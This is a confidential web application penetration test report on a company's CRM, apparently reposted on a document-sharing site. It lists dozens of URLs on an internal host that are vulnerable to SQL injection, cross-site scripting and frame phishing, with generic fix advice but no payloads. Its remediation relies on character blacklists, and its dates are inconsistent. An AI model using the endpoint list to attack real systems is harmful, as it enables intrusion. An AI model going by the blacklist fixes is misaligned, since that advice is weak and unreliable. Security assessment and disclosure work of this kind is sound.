+ All Categories
Home > Documents > Quatrro CRM Pt Report

Quatrro CRM Pt Report

Date post: 23-Oct-2014
Category:
Upload: directneha
View: 33 times
Download: 8 times
Share this document with a friend
Popular Tags:
23
APPLICATION PENETRATION TESTING REPORT Scope: CRM Submitted To: Quatrro Date: 28 th December 2012
Transcript

APPLICATION PENETRATION TESTING REPORT

Scope: CRM

Submitted To: Quatrro

Date: 28th December 2012

CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 1

Document Details

Company Quatrro

Document Title Penetration Testing Report

Date 28-03-2012

Classification Confidential

Document Type Report

CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 2

Table of Contents

Executive Summary 3 Goal 3 Scope 3 Assessment Findings 4 Details 12 Conclusion 22 Recommendation 22

CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 3

Executive Summary

We thank you for choosing Appin Software Security Pvt. Ltd. as your Information Security

partner. We appreciate your business and look forward to provide you services in the near

future. The following report presents the results of the application, as per your request. In case

you have any questions, please contact your Appin representative or email

[email protected]

Goal

To provide comprehensive Penetration Testing Report of the Web Application based on

OWASP Top 10 including but not limited to SQL Injection, CRLF Injections, Directory

Traversals, File Inclusion, Buffer Overflow, Cross Site Scripting(XSS), Cross Site Request

Forgery etc. which will help Quatrro to improve the Security level by addressing the

vulnerabilities.

Scope

In depth Security Assessment of the following Web Application:

Web Application Audit Dates

http://10.100.4.50/testcrm/ 26th March

CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 4

Assessment Findings

Ref No’s Vulnerability Name Vulnerable URLs Risk Level

1 SQL Injection http://10.100.4.50/testcrm/key_view.php?submit1=Vie

w&status=0

http://10.100.4.50/testcrm/orderdetail_frame.php?srno

=163473

http://10.100.4.50/testcrm/orderinfo.php?orderno=0111

111144

High

2 Cross Site

Scripting

http://10.100.4.50/testcrm/orderinfo.php?orderno=0111

111144

http://10.100.4.50/testcrm/currency_master.php?cid=15

http://10.100.4.50/testcrm/Payment_master.php?pid=1

1

http://10.100.4.50/testcrm/mail_template.php?mtid=16

http://10.100.4.50/testcrm/subcategory.php?action=edi

t&catid=1

High

CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 5

http://10.100.4.50/testcrm/newproduct.php?srno=558

http://10.100.4.50/testcrm/system.php?action=edit&ids

ystem=1

http://10.100.4.50/testcrm/component.php?action=edit

&idcomponent=1

http://10.100.4.50/testcrm/incident.php?action=edit&id

incident=1

http://10.100.4.50/testcrm/module.php?action=edit&id

module=1

http://10.100.4.50/testcrm/promocode.php?action=edit

&id=6

http://10.100.4.50/testcrm/origin_of_cust.php?action=e

dit&srno=1

http://10.100.4.50/testcrm/sale_medium.php?action=ed

it&id=1

http://10.100.4.50/testcrm/brand_master.php?action=e

dit&id=1

CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 6

http://10.100.4.50/testcrm/disposition_master.php?acti

on=edit&id=1

http://10.100.4.50/testcrm/computer_type.php?action=

edit&code=1

http://10.100.4.50/testcrm/operatingsys.php?action=edi

t&code=2

http://10.100.4.50/testcrm/computer_age.php?action=e

dit&code=1

http://10.100.4.50/testcrm/internet_con.php?action=edi

t&code=3

http://10.100.4.50/testcrm/createdfrom.php?action=edi

t&id=2

http://10.100.4.50/testcrm/subvdnmap_edit.php?accou

nt=91011832&vdn=60250

http://10.100.4.50/testcrm/subvdnmap_edit.php?accou

nt=91011832

http://10.100.4.50/testcrm/reportschdl.php?action=edit

&id=1

CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 7

http://10.100.4.50/testcrm/matrixmaster.php?eid=3&ac

c=36321671&plan=200000522&act=1

http://10.100.4.50/testcrm/partnerreportsetting.php?ac

tion=edit&id=14

http://10.100.4.50/testcrm/survey_edit.php?surveyid=6

9C82D9A-0E2E-E011-91D3-001E0BD9CB7C

http://10.100.4.50/testcrm/menu_header.php?action=e

dit&headerid=1

http://10.100.4.50/testcrm/sub_menu.php?action=edit

&idsmenu=1

http://10.100.4.50/testcrm/rolemaster.php?action=edit

&iduserrights=1

http://10.100.4.50/testcrm/business_agent.php?id=1

http://10.100.4.50/testcrm/accountdetails.php?account

=91011832&action=1&aname=AAA

http://10.100.4.50/testcrm/ibmaster.php?ibid=206

CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 8

http://10.100.4.50/testcrm/subibmaster.ph?ibid=1

http://10.100.4.50/testcrm/department.php?action=edit

&depid=3

http://10.100.4.50/testcrm/employeemaster.php?eid=1

http://10.100.4.50/testcrm/business_agent.php?id=1

3 Unencrypted

Login Request

http://10.100.4.50/testcrm/login-exec.php Medium

4 Phishing Through

Frames

http://10.100.4.50/testcrm/orderinfo.php?orderno=0111

111144

http://10.100.4.50/testcrm/currency_master.php?cid=15

http://10.100.4.50/testcrm/Payment_master.php?pid=1

1

http://10.100.4.50/testcrm/mail_template.php?mtid=16

http://10.100.4.50/testcrm/subcategory.php?action=edi

t&catid=1

http://10.100.4.50/testcrm/newproduct.php?srno=558

http://10.100.4.50/testcrm/system.php?action=edit&ids

Medium

CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 9

ystem=1

http://10.100.4.50/testcrm/component.php?action=edit

&idcomponent=1

http://10.100.4.50/testcrm/incident.php?action=edit&id

incident=1

http://10.100.4.50/testcrm/module.php?action=edit&id

module=1

http://10.100.4.50/testcrm/promocode.php?action=edit

&id=6

http://10.100.4.50/testcrm/origin_of_cust.php?action=e

dit&srno=1

http://10.100.4.50/testcrm/sale_medium.php?action=ed

it&id=1

http://10.100.4.50/testcrm/brand_master.php?action=e

dit&id=1

http://10.100.4.50/testcrm/disposition_master.php?acti

on=edit&id=1

http://10.100.4.50/testcrm/computer_type.php?action=

CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 10

edit&code=1

http://10.100.4.50/testcrm/operatingsys.php?action=edi

t&code=2

http://10.100.4.50/testcrm/computer_age.php?action=e

dit&code=1

http://10.100.4.50/testcrm/internet_con.php?action=edi

t&code=3

http://10.100.4.50/testcrm/createdfrom.php?action=edi

t&id=2

http://10.100.4.50/testcrm/subvdnmap_edit.php?accou

nt=91011832&vdn=60250

http://10.100.4.50/testcrm/subvdnmap_edit.php?accou

nt=91011832

http://10.100.4.50/testcrm/reportschdl.php?action=edit

&id=1

http://10.100.4.50/testcrm/matrixmaster.php?eid=3&ac

c=36321671&plan=200000522&act=1

http://10.100.4.50/testcrm/partnerreportsetting.php?ac

CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 11

tion=edit&id=14

http://10.100.4.50/testcrm/survey_edit.php?surveyid=6

9C82D9A-0E2E-E011-91D3-001E0BD9CB7C

http://10.100.4.50/testcrm/menu_header.php?action=e

dit&headerid=1

http://10.100.4.50/testcrm/sub_menu.php?action=edit

&idsmenu=1

http://10.100.4.50/testcrm/rolemaster.php?action=edit

&iduserrights=1

http://10.100.4.50/testcrm/business_agent.php?id=1

http://10.100.4.50/testcrm/accountdetails.php?account

=91011832&action=1&aname=AAA

http://10.100.4.50/testcrm/ibmaster.php?ibid=206

http://10.100.4.50/testcrm/subibmaster.ph?ibid=1

http://10.100.4.50/testcrm/department.php?action=edit

&depid=3

CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 12

http://10.100.4.50/testcrm/employeemaster.php?eid=1

http://10.100.4.50/testcrm/business_agent.php?id=1

5 Directory Listing

Enabled

http://10.100.4.50/testcrm/template

http://10.100.4.50/testcrm/include

http://10.100.4.50/testcrm/images

Low

Details

http://10.100.4.50/testcrm/

Vulnerability

SQL Injection

Risk

High

Potential Security Issue

It is possible to view, modify or delete database entries and tables

Technical Description

A common way to reduce the risk of being attacked by SQL injection is to supress detailed SQL

error messages, which are usually used by attackers to easily locate scripts that are susceptible

to SQL Injection.

The concept behind blind SQL injection is that it is possible, even without receiving direct data

from the database (in the form of an error message, or leaked information), to extract data from

the database, one bit at a time, or to modify the query in a malicious way. The idea is that the

CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 13

application behavior (result identical to the original result, or result different than the original

result) can provide a single bit of information about the evaluated (modified) query, meaning,

it's possible for the attacker to formulate an SQL Boolean expression whose evaluation (single

bit) is compromised in the form of the application behavior (identical/un-identical to the

original behavior).

Fix Recommendations

There are several issues whose remediation lies in sanitizing user input.

By verifying that user input does not contain hazardous characters, it is possible to prevent

malicious users from causing your application to execute unintended operations, such as

launch arbitrary SQL queries, embed Javascript code to be executed on the client side, run

various operating system commands etc.

It is advised to filter out all the following characters:

[1] | (pipe sign)

[2] & (ampersand sign)

[3] ; (semicolon sign)

[4] $ (dollar sign)

[5] % (percent sign)

[6] @ (at sign)

[7] ' (single apostrophe)

[8] " (quotation mark)

[9] \' (backslash-escaped apostrophe)

[10] \" (backslash-escaped quotation mark)

[11] <> (triangular parenthesis)

[12] () (parenthesis)

[13] + (plus sign)

CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 14

[14] CR (Carriage return, ASCII 0x0d)

[15] LF (Line feed, ASCII 0x0a)

[16] , (comma sign)

[17] \ (backslash)

CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 15

http://10.100.4.50/testcrm/

Vulnerability

Cross Site Scripting

Risk

High

Potential Security Issue

It is possible to steal or manipulate customer session and cookies, which might be used to

impersonate a legitimate user, allowing the hacker to view or alter user records, and to

perform transactions as that user.

Technical Description

The Cross-Site Scripting attack is a privacy violation, that allows an attacker to acquire a

legitimate user's credentials and to impersonate that user when interacting with a specific

website.

The attack hinges on the fact that the web site contains a script that returns a user's input

(usually a parameter value) in an HTML page, without first sanitizing the input. This allows an

input consisting of JavaScript code to be executed by the browser when the script returns this

input in the response page. As a result, it is possible to form links to the site where one of the

parameters consists of malicious JavaScript code. This code will be executed (by a user's

browser) in the site context, granting it access to cookies that the user has for the site, and other

windows in the site through the user's browser.

Possible actions that can be performed by the script are:

[1] Send user's cookies (for the legitimate site) to the attacker.

[2] Send information that is accessible through the DOM (URLs, Form fields, etc.), to the

attacker.

The result is that the security and privacy of the victim user is compromised on the vulnerable

site.

Fix Recommendations

Sanitize user input & filter out JavaScript code. We suggest you filter the following characters:

CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 16

[1] <> (triangular parenthesis)

[2] " (quotation mark)

[3] ' (single apostrophe)

[4] % (percent sign)

[5] ; (semicolon)

[6] () (parenthesis)

[7] & (ampersand sign)

[8] + (plus sign)

CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 17

CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 18

http://10.100.4.50/testcrm/

Vulnerability

Unencrypted Login Request

Risk

Medium

Potential Security Issue

It may be possible to steal user login information such as usernames and passwords that are

sent unencrypted.

Technical Description

During the application test, it was detected that an unencrypted login request was sent to the server.

Since some of the input fields used in a login process (for example: usernames, passwords, etc.) are

personal and sensitive, it is recommended that they should be sent to the server over an encrypted

connection.

Fix Recommendations

Make sure that all login requests are sent encrypted to the server (e.g. SSL).

CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 19

http://10.100.4.50/testcrm/

Vulnerability

Phishing Through Frames

Risk

Medium

Potential Security Issue

It is possible to persuade a naive user to supply sensitive information such as username,

password, credit card number etc.

Technical Description

It is possible for an attacker to inject a frame or an iframe tag with malicious content which

resembles the attacked site. An incautious user may browse it and not realize that he is leaving

the original site and surfing to a malicious site. The attacker may then lure the user to login

again, thus acquiring his login credentials.

The fact that the fake site is embedded in the original site helps the attacker by giving his

phishing attempts a more reliable appearance.

Fix Recommendations

It is advised to filter out all the following characters:

[1] | (pipe sign)

[2] & (ampersand sign)

[3] ; (semicolon sign)

[4] $ (dollar sign)

[5] % (percent sign)

[6] @ (at sign)

[7] ' (single apostrophe)

[8] " (quotation mark)

[9] \' (backslash-escaped apostrophe)

[10] \" (backslash-escaped quotation mark)

[11] <> (triangular parenthesis)

[12] () (parenthesis)

[13] + (plus sign)

[14] CR (Carriage return, ASCII 0x0d)

[15] LF (Line feed, ASCII 0x0a)

CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 20

[16] , (comma sign)

[17] \ (backslash)

CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 21

http://10.100.4.50/testcrm/

Vulnerability

Directory Listing Enabled

Risk

Low

Potential Security Issue

It is possible to view and download the contents of certain web application virtual directories,

which might contain restricted files.

Technical Description

If the web server was configured improperly, it is possible to retrieve a directory listing by

sending a request for a specific directory, rather than for a file.

Fix Recommendations

[1] Configure the web server to deny listing of directories.

[2] Download a specific security patch according to the issue existing on your web server or

web application.

CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 22

Conclusion

On the basis of penetration testing carried out on your web application it can be

concluded that web application does contain vulnerabilities.

Recommendation

High & Medium Level vulnerabilities should be patched on priority.


Recommended